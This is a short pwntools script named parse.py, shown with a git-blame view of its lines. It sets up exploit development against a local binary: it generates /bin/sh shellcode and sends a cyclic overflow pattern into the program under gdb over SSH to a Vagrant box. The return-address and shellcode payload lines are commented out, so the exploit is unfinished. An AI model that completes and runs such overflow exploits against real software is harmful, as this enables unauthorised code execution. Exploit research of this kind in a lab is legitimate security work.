0day_dev/parse.py

from pwn import *
import base64

context.update(arch='i686', os='linux')

# Connect to the server with SSH
ssh_connection = ssh('vagrant', 'default', port=2222)

# Open a shell to write more stuff to
bash = ssh_connection.run('bash')

shellcode = shellcraft.sh()
print(shellcode)
print(hexdump(asm(shellcode)))

#payload  = cyclic(cyclic_find(0x0000555555555751))
payload = cyclic(500)
#payload += p32(0xdeadbeef)
#payload += asm(shellcode)
bash.sendline('echo ' + str(payload) +' > 50')
bash.sendline('gdb /vagrant/parse')
bash.sendline('run r < 50')
bash.interactive()
ya 2020-08-07 17:18:33 +00:00			`from pwn import *`
idk 2020-08-07 17:22:42 +00:00			`import base64`
ya 2020-08-07 17:18:33 +00:00
idk 2020-08-07 17:22:42 +00:00			`context.update(arch='i686', os='linux')`

			`# Connect to the server with SSH`
			`ssh_connection = ssh('vagrant', 'default', port=2222)`

			`# Open a shell to write more stuff to`
			`bash = ssh_connection.run('bash')`
ya 2020-08-07 17:18:33 +00:00
			`shellcode = shellcraft.sh()`
			`print(shellcode)`
			`print(hexdump(asm(shellcode)))`

new 2020-08-07 18:34:58 +00:00			`#payload = cyclic(cyclic_find(0x0000555555555751))`
			`payload = cyclic(500)`
			`#payload += p32(0xdeadbeef)`
			`#payload += asm(shellcode)`
			`bash.sendline('echo ' + str(payload) +' > 50')`
			`bash.sendline('gdb /vagrant/parse')`
			`bash.sendline('run r < 50')`
idk 2020-08-07 17:22:42 +00:00			`bash.interactive()`
ya 2020-08-07 17:18:33 +00:00